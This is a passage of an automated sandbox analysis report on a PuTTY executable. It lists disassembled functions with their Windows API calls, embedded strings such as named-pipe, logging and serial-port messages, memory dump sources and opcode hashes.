                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 804ad41689d049f1560dc765e22a098152a9bc99489f76399c77156cdfec8131
                      • Instruction ID: ea1a1ef4afe57efcbf58f34ac05e88d98d35473abbcb4b3a00f8b98dfe89eb2b
                      • Opcode Fuzzy Hash: 804ad41689d049f1560dc765e22a098152a9bc99489f76399c77156cdfec8131
                      • Instruction Fuzzy Hash: 17318F92754A5446EE95C97A8B293AD26439785BF0F9CC332CF3E837D8CE7C9952C204
                      Function 00007FF678696144 Relevance: .1, Instructions: 91COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4f12b34790bdc6bb620a2a64927610adf5e293a357984f462b3dc188a1bc07c1
                      • Instruction ID: 5f90cfb56c06325acd406a54c145d26ac625d0d9cee1c4a50d7382565f6803ff
                      • Opcode Fuzzy Hash: 4f12b34790bdc6bb620a2a64927610adf5e293a357984f462b3dc188a1bc07c1
                      • Instruction Fuzzy Hash: 4A31BE33E3C34361F6B947BD815653B1D429F82344E348039C50DC2ADADD2EBC46B208
                      Function 00007FF67864EE10 Relevance: .1, Instructions: 88COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ecc0479743d38391acdec0cd164ba2d42e0c0390d6a42f8b18c39abee2159e97
                      • Instruction ID: 668c70cb7d4e0aa2737bc52f00a3782cb3392b2b5cfd130e8135ce18777d8de7
                      • Opcode Fuzzy Hash: ecc0479743d38391acdec0cd164ba2d42e0c0390d6a42f8b18c39abee2159e97
                      • Instruction Fuzzy Hash: 4531481BB3A9A190F6B04979D13097F5A51D7C8BF0B791231CE1D93780CE69EE829304
                      Function 00007FF6785D1BD7 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 165windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Object$Select$CaretClipCreateDeletePaintPaletteRectStock$BeginBrushExcludeHideIntersectRealizeRectangleShowSolid
                      • String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c
                      • API String ID: 4109966220-2668247132
                      • Opcode ID: 329f361bb8f13bd28862b3555d1e71d4b298ea3fec208f4ed789b3c635bb196e
                      • Instruction ID: c779118f50d0f6ed56a19b7ba2ff6fa063f37a642641e100c5b59cc9d4f9fda9
                      • Opcode Fuzzy Hash: 329f361bb8f13bd28862b3555d1e71d4b298ea3fec208f4ed789b3c635bb196e
                      • Instruction Fuzzy Hash: 4371A437B2829296E724DB31B8446A67BA1FB58B94F604035CD4D83B54DE3CED45DF08
                      Function 00007FF67867B240 Relevance: 38.6, APIs: 13, Strings: 9, Instructions: 127filepipeCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B307
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B30F
                      • WaitNamedPipeA.KERNEL32 ref: 00007FF67867B322
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B329
                        • Part of subcall function 00007FF67869B8AC: _set_error_mode.LIBCMT ref: 00007FF67869B8D3
                        • Part of subcall function 00007FF678616F90: GetCurrentProcessId.KERNEL32 ref: 00007FF678616FD0
                        • Part of subcall function 00007FF678616F90: OpenProcess.KERNEL32 ref: 00007FF678616FE2
                        • Part of subcall function 00007FF678616F90: GetLastError.KERNEL32 ref: 00007FF678617033
                        • Part of subcall function 00007FF678616F90: LocalAlloc.KERNEL32 ref: 00007FF678617058
                        • Part of subcall function 00007FF678616F90: GetLengthSid.ADVAPI32 ref: 00007FF67861708A
                        • Part of subcall function 00007FF678616F90: CopySid.ADVAPI32 ref: 00007FF6786170AE
                        • Part of subcall function 00007FF678616F90: CloseHandle.KERNEL32 ref: 00007FF6786170D4
                        • Part of subcall function 00007FF678616F90: CloseHandle.KERNEL32 ref: 00007FF6786170E4
                        • Part of subcall function 00007FF678616F90: LocalFree.KERNEL32 ref: 00007FF6786170F2
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B38E
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B394
                        • Part of subcall function 00007FF678617AD0: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF67860DCDB), ref: 00007FF678617B7B
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B3CE
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B3D4
                      • EqualSid.ADVAPI32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B420
                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B42F
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B43A
                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B445
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CloseErrorHandleLast$Local$Free$Process$AllocCopyCreateCurrentEqualFileFormatLengthMessageNamedOpenPipeWait_set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/named-pipe-client.c$Error waiting for named pipe '%s': %s$Owner of named pipe '%s' is not us$Unable to get named pipe security information: %s$Unable to get user SID: %s$Unable to open named pipe '%s': %s$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0
                      • API String ID: 1091246219-3978821697
                      • Opcode ID: d677df9f2a73e2b24b901285e670e97e10afab5bd0461f87eb4ad6523a0a6656
                      • Instruction ID: ff48aa75064390cf98ffcb0210b34f605a917afa39a75686935369c8728e484c
                      • Opcode Fuzzy Hash: d677df9f2a73e2b24b901285e670e97e10afab5bd0461f87eb4ad6523a0a6656
                      • Instruction Fuzzy Hash: 6F516E22A38642A1FA00AB31A85827B2F61AF957A0F744135DD1EC77D5DF3CED45A708
                      Function 00007FF67861AC60 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 59libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00007FF6786162C0: LoadLibraryA.KERNELBASE ref: 00007FF6786162E9
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861ACA8
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861ACBB
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861ACCE
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861ACE1
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861ACF4
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861AD07
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861AD1A
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861AD2D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: ClosePrinter$EndDocPrinter$EndPagePrinter$EnumPrintersA$OpenPrinterA$StartDocPrinterA$StartPagePrinter$WritePrinter$spoolss.dll$winspool.drv
                      • API String ID: 2238633743-2130675966
                      • Opcode ID: 40374bb5c3ce95447d525cfe71ef60bc5d2953ae36c32016de0dce7f197f61ea
                      • Instruction ID: e510f940b098b52507e35c59bdaa41b3c775f5ece5acbf62ceb9ec4542277183
                      • Opcode Fuzzy Hash: 40374bb5c3ce95447d525cfe71ef60bc5d2953ae36c32016de0dce7f197f61ea
                      • Instruction Fuzzy Hash: BB310D26D2DB02A0FA019731F9553673FA5AF20B81F740535C44C8A3A4DFBDE945AB5C
                      Function 00007FF678616DD0 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 85libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616E15
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616E42
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616E6F
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616E9C
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616EC9
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616EF2
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616F17
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetEntriesInAclA$SetSecurityDescriptorOwner$SetSecurityInfo$advapi32.dll
                      • API String ID: 190572456-1260934078
                      • Opcode ID: 85342a26e3eb30e5a6748582a1d3f7838cb8d28d6283a6b5bad0e46a1c599cdf
                      • Instruction ID: 6c1c823f5020e23e88fe4d9dd531f79b2f3d649a6cdec22aa0dc5cad4ced1636
                      • Opcode Fuzzy Hash: 85342a26e3eb30e5a6748582a1d3f7838cb8d28d6283a6b5bad0e46a1c599cdf
                      • Instruction Fuzzy Hash: 9841C82EE3EB43B5FA558B34A8543762EA2AF54740F740435D40DCA6A1EF2CED44BB18
                      Function 00007FF6785FC180 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 239COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: LocalTimewcsftime
                      • String ID: %08zx%*s$ (%zu byte%s omitted)$ (%s)$ on behalf of downstream #%u$#0x%lx, $%02x$%Y-%m-%d %H:%M:%S$%s packet $%s raw data at %s$Incoming$Outgoing$XX$type %d / 0x%02x (%s)
                      • API String ID: 2400502282-2889948183
                      • Opcode ID: af7e900566eeaab05af0dc183a8dfeaa3f51c703768e5a55bcac3d6a918a64e1
                      • Instruction ID: c58c322ae85eded8379752c56c92c49705916aecfbdb3bd3cdee97d49b268547
                      • Opcode Fuzzy Hash: af7e900566eeaab05af0dc183a8dfeaa3f51c703768e5a55bcac3d6a918a64e1
                      • Instruction Fuzzy Hash: 11A1E623A2C69291FEA0DB35A4403BA6B60AF65794F701432CE4D87795EF6CDD05DB08
                      Function 00007FF678604E40 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 117COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CommState
                      • String ID: Configuring %s$Configuring %s flow control$Configuring %s parity$Configuring %u data bits$Configuring baud rate %lu$Configuring serial port: %s$Configuring serial timeouts: %s$Invalid number of stop bits (need 1, 1.5 or 2)
                      • API String ID: 4071006776-1037083001
                      • Opcode ID: ff5f91483310e7e7f6c17e52eacb67a89ada3404592253e6428ea0b353a84ac3
                      • Instruction ID: 3059e36ce92e3a4c7531540596e3a99a8362346c712782c1b11bc6d9bb3f930f
                      • Opcode Fuzzy Hash: ff5f91483310e7e7f6c17e52eacb67a89ada3404592253e6428ea0b353a84ac3
                      • Instruction Fuzzy Hash: 7841BE63E28646A1EE109B31D8411BB6B60FF95BC0F704131DA0EC7B9ADE2CEE41D748
                      Function 00007FF6785FBC70 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 136COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00007FF67869E168: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67869E19C
                        • Part of subcall function 00007FF678626500: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,00007FF6785FB996), ref: 00007FF67862651C
                      • wcsftime.LIBCMT ref: 00007FF6785FBD08
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: LocalTime_invalid_parameter_noinfowcsftime
                      • String ID: %Y.%m.%d %H:%M:%S$%s session log (%s mode) to file: %s$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/logging.c$=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=$Appending$Disabled writing$Error writing$SSH raw data$Writing new$ctx->state != L_OPENING$unknown
                      • API String ID: 42641226-759394250
                      • Opcode ID: d1f925c6066ddc6873973fa0135088d95ba991635fbe29c8fcac85f9a80971c2
                      • Instruction ID: 7d18e8c7cffacc0baff5671f98f160a351a98e2088cbe4986763cf36d122260b
                      • Opcode Fuzzy Hash: d1f925c6066ddc6873973fa0135088d95ba991635fbe29c8fcac85f9a80971c2
                      • Instruction Fuzzy Hash: 8451AB63B28646A1FE40DB25D4552BA2B61EF84B84FB18032CE0DC7795EF3CE946D709
                      Function 00007FF6785D1EFB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Cursor$Window$InfoLongMenuMessageMonitorPopupProcSendShowTrackZoomed
                      • String ID: (
                      • API String ID: 1195453808-3887548279
                      • Opcode ID: 8f86f2efebeacca7557ac59f5c2cb3069cb5cddfb4d1881aac2acef9b847a86d
                      • Instruction ID: f517a6e74a5c9ad5cc2f5416e206c148a67db5471a23ba134d0f4b086c2aaf2a
                      • Opcode Fuzzy Hash: 8f86f2efebeacca7557ac59f5c2cb3069cb5cddfb4d1881aac2acef9b847a86d
                      • Instruction Fuzzy Hash: C0418033A2C68596F6609B30E4857B66BA0FF94750F640034CE4DC6695CF7CED85AB18
                      Function 00007FF67860EDC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 147networkCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: htonl$ErrorLastgetaddrinfogethostbynameinet_addr
                      • String ID: Host does not exist$Host not found$Network is down
                      • API String ID: 106626933-2906891963
                      • Opcode ID: a468348b73b74eb220ed4a3ee69ce07d4567b72aeecd3e0c29de32f9fae1e373
                      • Instruction ID: 33b637da019a12d7ad6db4ad563ce0795ca40699991043da8a20f2a93396b842
                      • Opcode Fuzzy Hash: a468348b73b74eb220ed4a3ee69ce07d4567b72aeecd3e0c29de32f9fae1e373
                      • Instruction Fuzzy Hash: 39510327A2864996FB609F35E44477B7A91EB84754F240134DA0E877D1EF7CE880A708
                      Function 00007FF6785FB0F0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183comCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CreateFileInstanceModuleName_invalid_parameter_noinfo
                      • String ID: %.*s%s$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/jump-list.c$Connect to PuTTY session '$Pageant.exe$Run %.*s$appname
                      • API String ID: 3863850918-4263420936
                      • Opcode ID: 3efb2a1c9e254bf4237273d01518b2adef5c6020e4d9115cd5eb189016053426
                      • Instruction ID: b896d78eb1053dfb744765f72e0fe144ff82cae5b538370c99a083e7d8e7be0e
                      • Opcode Fuzzy Hash: 3efb2a1c9e254bf4237273d01518b2adef5c6020e4d9115cd5eb189016053426
                      • Instruction Fuzzy Hash: 0A81A123B28A42A1FE40DB36D4442BB6B91AF95BD0FA44031DD0EC7795EF3CE9059709
                      Function 00007FF6786A2CE8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(?,00000000,?,00007FF6786A28A0,?,?,00000000,00007FF6786A67C0,?,?,00000003,00007FF67869837D), ref: 00007FF6786A2E67
                      • GetProcAddress.KERNEL32(?,00000000,?,00007FF6786A28A0,?,?,00000000,00007FF6786A67C0,?,?,00000003,00007FF67869837D), ref: 00007FF6786A2E73
                      Strings
                      Memory Dump Source
